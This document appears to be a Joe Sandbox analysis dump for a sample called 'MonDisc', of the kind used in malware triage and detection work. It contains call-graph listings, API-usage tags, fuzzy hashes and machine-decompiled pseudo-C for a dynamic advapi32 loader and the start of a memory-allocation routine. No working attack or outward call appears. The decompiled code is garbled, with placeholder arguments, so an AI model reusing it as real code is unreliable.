57333->57341 57334->57337 57335 7ff62c90c0bd 57338 7ff62c909d30 18 API calls 57335->57338 57337->57333 57337->57335 57340 7ff62c90c0e2 57337->57340 57338->57340 57340->57326 57342 7ff62c8fa3fb 57345 7ff62c8fa391 57342->57345 57343 7ff62c8fa469 GetMessageExtraInfo 57349 7ff62c8fa474 57343->57349 57344 7ff62c8fa549 AnyPopup 57347 7ff62c8fa554 57344->57347 57345->57342 57345->57343 57346 7ff62c8fa3ad GetUserDefaultLangID 57345->57346 57346->57345 57346->57346 57348 7ff62c8fa5c2 GetLargePageMinimum GetModuleHandleW 57347->57348 57350 7ff62c8fa5de 57348->57350 57349->57344 57349->57348 57353 7ff62c8fb610 57350->57353 57362 7ff62c916850 57353->57362 57355 7ff62c8fb637 57356 7ff62c8f3037 43 API calls 57355->57356 57357 7ff62c8fb6bf 57355->57357 57356->57355 57367 7ff62c910570 57357->57367 57359 7ff62c8fa5fb 57360 7ff62c8fb6df 57360->57359 57361 7ff62c914ac0 GetLastError VirtualQuery VirtualFree SetLastError 57360->57361 57361->57359 57363 7ff62c9168bb 57362->57363 57364 7ff62c91686e WaitForSingleObject RtlDeleteCriticalSection 57362->57364 57363->57355 57365 7ff62c9168ab 57364->57365 57370 7ff62c910280 35 API calls _fread_nolock 57365->57370 57371 7ff62c93b3d0 57367->57371 57370->57363 57372 7ff62c93b3f3 57371->57372 57374 7ff62c91058c 57371->57374 57373 7ff62c93b400 VirtualFree 57372->57373 57373->57373 57373->57374 57375 7ff62c912172 LoadLibraryExA 57376 7ff62c91221b 57375->57376 57377 7ff62c912190 GetProcAddress 57375->57377 57377->57376 57378 7ff62c8f4a97 57379 7ff62c8f4aa7 57378->57379 57382 7ff62c8ff020 57379->57382 57381 7ff62c8f4ac4 57383 7ff62c984d84 _set_errno_from_matherr 11 API calls 57382->57383 57384 7ff62c8ff04e GetLastError 57383->57384 57385 7ff62c8ff080 57384->57385 57386 7ff62c8ff0ca 57384->57386 57389 7ff62c8ff0be 57385->57389 57396 7ff62c8fb470 18 API calls 57385->57396 57386->57389 57397 7ff62c8fb470 18 API calls 57386->57397 57390 7ff62c910750 43 API calls 57389->57390 57391 7ff62c8ff0f6 57389->57391 57392 7ff62c8ff131 57389->57392 57390->57392 
57394 7ff62c984d84 _set_errno_from_matherr 11 API calls 57391->57394 57392->57391 57392->57392 57398 7ff62c8feea0 18 API calls _handle_error 57392->57398 57395 7ff62c8ff1e5 SetLastError 57394->57395 57395->57381 57396->57389 57397->57389 57398->57391

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction ID: c255fcdf3587bed30c444a5272f0466265782f6c69e309d1b253e226457bd770
                              • Opcode Fuzzy Hash: 91ec8c885c2c6ff6561f716371217a6039addec031bcfe83c507029f45e2ccbf
                              • Instruction Fuzzy Hash: 8B825C62E289074AFF545F34AD6A2B92AD47F25370FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Time$ClickDefaultDoubleLang$MessageParentSystemUser
                              • String ID:
                              • API String ID: 2994643361-0
                              • Opcode ID: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction ID: 7c62de22613ab7baebe31576a0eb5790a5b5476824f76493797b5bfa5578368a
                              • Opcode Fuzzy Hash: 64eabef1d45d85b0c78bb19536166fa48b41f505652a30b45eab00c61a6f173f
                              • Instruction Fuzzy Hash: 10825C62E289074AFF545F34AD6A2B92AD47F25374FA4463ED809D2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              • Associated: 0000000F.00000002.466744912.00007FF62C8F0000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467164335.00007FF62C9EE000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467229302.00007FF62CA36000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467242423.00007FF62CA39000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467263954.00007FF62CA48000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467385103.00007FF62CA62000.00000002.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467397508.00007FF62CBBD000.00000004.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467420435.00007FF62CBBF000.00000020.00000001.01000000.00000008.sdmp
                              • Associated: 0000000F.00000002.467506197.00007FF62CBF0000.00000002.00000001.01000000.00000008.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction ID: dc269e71354444110279dc8fec1c8eecf7636a4595e3780099b6099d5ea103cf
                              • Opcode Fuzzy Hash: 6bff2ef37a1e8b58c398f1a0837f5b693386628ce94bc098f00c10939dc4554f
                              • Instruction Fuzzy Hash: 6F825C62E289074AFF545F34AD6A2B92AD57F25370FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction ID: f75f8f7684c0fed5b36c5ded3087eaf59489034908deb20d6df8e625951692ff
                              • Opcode Fuzzy Hash: 1729a107793c4e065a05af5c08b281f8753eb9a14e7e7a0112f43c3bc5ed30ff
                              • Instruction Fuzzy Hash: C8825C62D289074AFF555F34AC6A2B92AD47F253B4FA4463AD80DD2297EF3CF1498103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: MessageTime
                              • String ID:
                              • API String ID: 761539514-0
                              • Opcode ID: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
                              • Instruction ID: a2896c53d6ac9807c43ec495a312f5eb81710c50be4b1ad746ef493664e697a5
                              • Opcode Fuzzy Hash: 8b4aad55dd11f83bfe675c7d283c766344b9de2021c3024b51f32849b0f369df
                              • Instruction Fuzzy Hash: 42725E62D2C9074AFF555B34AC6A2B92AD57F25370FA4463AD80ED3297DF3CB1498203
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window$ExtraInfoLengthMessageText$DefaultForegroundIconicLangLargeMinimumPageParentPopupUser
                              • String ID:
                              • API String ID: 2764942508-0
                              • Opcode ID: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction ID: bd92dc210b8b7842c86711e3d694decafa4df4de14a90d28e3987d5445ac83f2
                              • Opcode Fuzzy Hash: ebf465c328883eba75dfd2c0a98478ad7369ff7afb75a212376519344fbb4255
                              • Instruction Fuzzy Hash: 0C623E62D2C9164AFF516B34AC652B92AD57F253B0F94863AD80DD22A7EF3CB085C503
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction ID: bddc54d9a925b88dfb70d14a41d7d9557462e42e08ee6024d555c6ac19cfea86
                              • Opcode Fuzzy Hash: 07eb7d11d4295bc528075bb4d4565afe5d1d99db761832c83f715944b95826d0
                              • Instruction Fuzzy Hash: 32427162D1C9474EFF516B34AC262B92AD57F267B0FA4463AD80DD7293EF2CB0458213
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window$Popup$CommandCountExtraInfoLineMessageShellTick$CurrentForegroundHandleLengthModuleProcessTextZoomed$ActiveIconicLast
                              • String ID: arg
                              • API String ID: 2041650259-2022414218
                              • Opcode ID: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction ID: 576b1569fccb6fc0b2d11123588c656783922bfd67bbe2e8611d73cf5387dc0f
                              • Opcode Fuzzy Hash: a090476f7653a4f20d9f7cb68fa832dfc61f8030dfde6aa4fefa4dc614a2e054
                              • Instruction Fuzzy Hash: 6432C362E289174AFF146B34AC291B92AD47F257B1F94463AD90EC22D7EF3CF1458243
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Parent
                              • String ID:
                              • API String ID: 975332729-0
                              • Opcode ID: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction ID: 32ad1f17b85f2d0905f1b810eb765aa32ea88ef0f19ffe0af850b0224aa11550
                              • Opcode Fuzzy Hash: 5abf0f698b70b8af441bf28a934e024baafb8f7a8809d033692b1be2efeb7010
                              • Instruction Fuzzy Hash: C3625CA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: CurrentProcess
                              • String ID:
                              • API String ID: 2050909247-0
                              • Opcode ID: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction ID: eab47c52af4be9f17a0de86fde66c6969f9aad7bfd076be5387e33f66c717e40
                              • Opcode Fuzzy Hash: d8565618b221d0dbace0c3f3fd3bff6ef2fe4a319c6a6cbf516c01d990431181
                              • Instruction Fuzzy Hash: 3A625FA2D289174EFF456F34AC662B929D47F263B4FA4463AD819D32D7EF2CB0458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction ID: 6dcbdcdff8d4f216c09dac04d7a1f590a311eb00f3ec093ac9ad22f8fd447030
                              • Opcode Fuzzy Hash: 7b475249e44056b32032913138981995d7b1b0ce169ccba9ed2285b008a1ba8d
                              • Instruction Fuzzy Hash: 50624D97E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Window
                              • String ID:
                              • API String ID: 2353593579-0
                              • Opcode ID: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction ID: cb856b98549ed4dd4c1da389ce0344cee3cd597b9ef042c0815b9eb7b865d8c1
                              • Opcode Fuzzy Hash: 2c91cb14d26e3cbfeb0a6b6d52593c8416ea1c1e338f76a07c1c61ea44a7b0ab
                              • Instruction Fuzzy Hash: 38625DA3E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: Popup$Window$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 1249249616-0
                              • Opcode ID: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction ID: 7bef7cea88e5bd89c8e1d25cfa540e282b1e8d2b0ae9156683c7e7ba320bd845
                              • Opcode Fuzzy Hash: 649e96a3040e716dd2e475f25863d26953d14027e2addb84bc51d75de1cabe73
                              • Instruction Fuzzy Hash: 59625EA3E289034AFF446F34AC662B969D57F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: PopupWindow$Message$ActiveCurrentDesktopExtraIconicInfoLastLengthProcessTextTimeZoomed
                              • String ID:
                              • API String ID: 4133814404-0
                              • Opcode ID: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction ID: 8b68264210559b207cab4b9bb32b1c7e8740c8e11b58d146dd131adef6c26471
                              • Opcode Fuzzy Hash: 7675edd059d30eba094bff5d3b99d3534c4a9bcfa657b59bcbe04e52a15992e7
                              • Instruction Fuzzy Hash: D2625DA7E289034AFF446F34AC662B969D47F263B4FA4473AD419D22D7EF2CB1458103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction ID: c3dd9cdd65f58efd872d6328274130541b24cd4587b1b7cca7c9878c0e166398
                              • Opcode Fuzzy Hash: 19466474feee5869fef1398aee390ee7b46f57e004e48e6c13e1203a141ea1ad
                              • Instruction Fuzzy Hash: 17325292D1CA178EFF516B309C262B926957F273B0FA48636D84DD7297EF2CB0858113
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000003.456540596.00007FF6290C0000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF6290C0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_3_7ff6290c0000_MonDisc.jbxd
                              Similarity
                              • API ID:
                              • String ID: $(?}|$?$@-}|$@-}|$N$P$Q$R$S$V$^$`$c$d$e$f$g$h$i$k$l$m$o$p$p,}|$p,}|$p,}|$&}|$&}|
                              • API String ID: 0-2371175363
                              • Opcode ID: 28e2ecd05f6a981cb70f20ca57dc87416b017f9c0c4071573e72cc46f1fc6239
                              • Instruction ID: e31cfa4ef45b5ef5b5ef1f6db5e7c28a765b915ab5fc5a49dd6f5b876119d26b
                              • Opcode Fuzzy Hash: 28e2ecd05f6a981cb70f20ca57dc87416b017f9c0c4071573e72cc46f1fc6239
                              • Instruction Fuzzy Hash: 9D04A870814F0F8ADB55DF2888486A4B3A0FF59320F6543B8C86E9B5D6DF34A5C2D792
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ClickDoubleTime$DefaultDesktopLangSystemWindow
                              • String ID:
                              • API String ID: 146177575-0
                              • Opcode ID: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction ID: a29f918c35169a58e0984b62eca24ba4dc25f963b370f662b738bcafeeb3db39
                              • Opcode Fuzzy Hash: 1ab11c2d80e92e67c8a4e12a9d8885586669eec9125ded3814e100798d82fbde
                              • Instruction Fuzzy Hash: 2EC162A2D2C9438AFF006B34AD1A2B926E47F257B4F544B39D40AD26A7DF3CF1458613
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: DefaultExtraInfoLangMessageUser
                              • String ID: <
                              • API String ID: 3021954254-4251816714
                              • Opcode ID: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction ID: 087b3a54ed1d34837da6572d19a92faa152105025a53e25295fae01fa3735caf
                              • Opcode Fuzzy Hash: 402f9aef2e047f993df22b8c630db0140b6e5c85603be60a7ccbcf4cca1a9ae4
                              • Instruction Fuzzy Hash: 7461AF57D685038AEF515F389C9A2FA59D43F293B4F948639D849C21A7EE3CF1898103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ContextEntryFunctionLookup$CaptureExceptionRaiseRestoreUnwindVirtual
                              • String ID:
                              • API String ID: 2358177407-0
                              • Opcode ID: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction ID: 02850991cc3d5dc36d953c0e9c5773ddb23191c0d570766eab3e868c25b50f8c
                              • Opcode Fuzzy Hash: 4c4c5958612997501fae227bd0c84ea8e1ad64d21959aac5b581581413320623
                              • Instruction Fuzzy Hash: 83314932A08B8182EF608F15F8443EAB361FB88790F485436DA8D43669EF3DE549CB41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: ExtraHandleInfoLargeMessageMinimumModulePagePopup
                              • String ID: <
                              • API String ID: 2008092851-4251816714
                              • Opcode ID: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction ID: 8d23a95a2b9b932e6a4cc62c2c0218142066baec86900b377243b1e269e8e6cf
                              • Opcode Fuzzy Hash: 5b82afd13b6bb972a03a49472783478f1010767152c41c8eb140941de95efdb6
                              • Instruction Fuzzy Hash: C251BF57D689034AFF555B349CAA2FA59C43F293B4F948A39D949C22A3DE3CF1894103
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6689 7ff62c912172-7ff62c91218a LoadLibraryExA 6690 7ff62c91221b-7ff62c912222 6689->6690 6691 7ff62c912190-7ff62c9121aa GetProcAddress 6689->6691 6691->6690
                              C-Code - Quality: 21%
                              			E00007FF67FF62C912172(long long __rax, long long* __rbx) {
                              				void* _t15;
                              				intOrPtr _t27;
                              				intOrPtr _t29;
                              				intOrPtr _t31;
                              				intOrPtr _t33;
                              				void* _t42;
                              
                              				 *(_t42 + 0x37) =  *(_t42 + 0x37) << 0x45;
                              				LoadLibraryExA(??, ??, ??); // executed
                              				if (__rax == 0) goto 0x2c91221b;
                              				GetProcAddress(??, ??); // executed
                              				 *0x2ca36f70 = __rax;
                              				if (__rax == 0) goto 0x2c91221b;
                              				if ( *((long long*)(__rax))() == 0) goto 0x2c91221b;
                              				_t27 =  *((intOrPtr*)(__rbx));
                              				if (_t27 - 2 >= 0) goto 0x2c9121ca;
                              				 *__rbx = _t27 + 2;
                              				_t29 =  *((intOrPtr*)(__rbx + 8));
                              				if (_t29 - 0x40 >= 0) goto 0x2c9121dc;
                              				 *((long long*)(__rbx + 8)) = _t29 + 0x40;
                              				_t31 =  *((intOrPtr*)(__rbx + 0x10));
                              				if (_t31 - 0x200 >= 0) goto 0x2c9121f2;
                              				 *((long long*)(__rbx + 0x10)) = _t31 + 0x200;
                              				_t33 =  *((intOrPtr*)(__rbx + 0x18));
                              				if (_t33 - 0x20000 >= 0) goto 0x2c912208;
                              				 *((long long*)(__rbx + 0x18)) = _t33 + 0x20000;
                              				E00007FF67FF62C912230(_t12, _t15, __rbx);
                              				return 1;
                              			}










                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000F.00000002.466752794.00007FF62C8F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF62C8F0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_15_2_7ff62c8f0000_MonDisc.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: E$SystemFunction036$advapi32.dll
                              • API String ID: 2574300362-2157769833
                              • Opcode ID: 784dea273f4089e33f14c0455f5d1bb132508375cdcb4c3a2b6d1edbc26e4bb3
                              • Instruction ID: 7c490b1ad07591223fcd75cd5f40cbbfab85c7eea5e6f1caf26b8345108a7caf
                              • Opcode Fuzzy Hash: 784dea273f4089e33f14c0455f5d1bb132508375cdcb4c3a2b6d1edbc26e4bb3
                              • Instruction Fuzzy Hash: BFE04661E0AB8292FF498B24BC402B522E4BF48361B880835C50EC2396FF7CE0898302
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 6692 7ff62c914230-7ff62c914265 6693 7ff62c91426b-7ff62c91427c 6692->6693 6694 7ff62c9142fd-7ff62c91430e 6692->6694 6693->6694 6697 7ff62c91427e-7ff62c9142b4 GetLastError VirtualAlloc SetLastError 6693->6697 6695 7ff62c91445b 6694->6695 6696 7ff62c914314-7ff62c914349 GetLastError VirtualAlloc SetLastError 6694->6696 6699 7ff62c91445d-7ff62c91447b 6695->6699 6696->6695 6698 7ff62c91434f-7ff62c91435c 6696->6698 6697->6694 6700 7ff62c9142b6-7ff62c9142bc 6697->6700 6701 7ff62c914362-7ff62c914366 6698->6701 6702 7ff62c914404-7ff62c91440d call 7ff62c913f80 6698->6702 6703 7ff62c9142be-7ff62c9142c1 6700->6703 6704 7ff62c9142c3-7ff62c9142c6 6700->6704 6706 7ff62c914370-7ff62c91437e 6701->6706 6708 7ff62c914412-7ff62c914419 6702->6708 6707 7ff62c9142c9-7ff62c9142f7 6703->6707 6704->6707 6709 7ff62c91438b-7ff62c914392 6706->6709 6710 7ff62c914380-7ff62c914387 6706->6710 6707->6694 6707->6699 6708->6695 6711 7ff62c91441b-7ff62c914442 6708->6711 6713 7ff62c9143ea-7ff62c9143ed 6709->6713 6714 7ff62c914394-7ff62c914397 6709->6714 6710->6706 6712 7ff62c914389 6710->6712 6711->6699 6715 7ff62c9143ef 6712->6715 6713->6702 6713->6715 6714->6713 6716 7ff62c914399-7ff62c9143b2 6714->6716 6719 7ff62c9143f3-7ff62c9143f9 6715->6719 6717 7ff62c9143be-7ff62c9143e8 6716->6717 6718 7ff62c9143b4-7ff62c9143ba 6716->6718 6717->6708 6718->6717 6720 7ff62c9143fb-7ff62c914402 6719->6720 6721 7ff62c914444-7ff62c914459 call 7ff62c915690 6719->6721 6720->6702 6720->6719 6721->6699
                              C-Code - Quality: 51%
                              			E00007FF67FF62C914230(void* __rax, long long __rbx, void* __rcx, signed int __rdx, long long __rdi, long long __rsi) {
                              				long _t51;
                              				signed int _t52;
                              				void* _t54;
                              				void* _t75;
                              				void* _t87;
                              				intOrPtr* _t88;
                              				signed long long _t92;
                              				long long _t94;
                              				long long* _t95;
                              				void* _t98;
                              				intOrPtr* _t104;
                              				intOrPtr _t105;
                              				long long _t107;
                              				intOrPtr _t110;
                              				void* _t115;
                              				signed long long _t118;
                              				signed long long _t120;
                              				signed long long _t121;
                              				long long _t129;
                              				void* _t133;
                              				intOrPtr _t136;
                              				intOrPtr _t139;
                              				intOrPtr _t141;
                              				long _t142;
                              				long _t146;
                              				signed long long _t147;
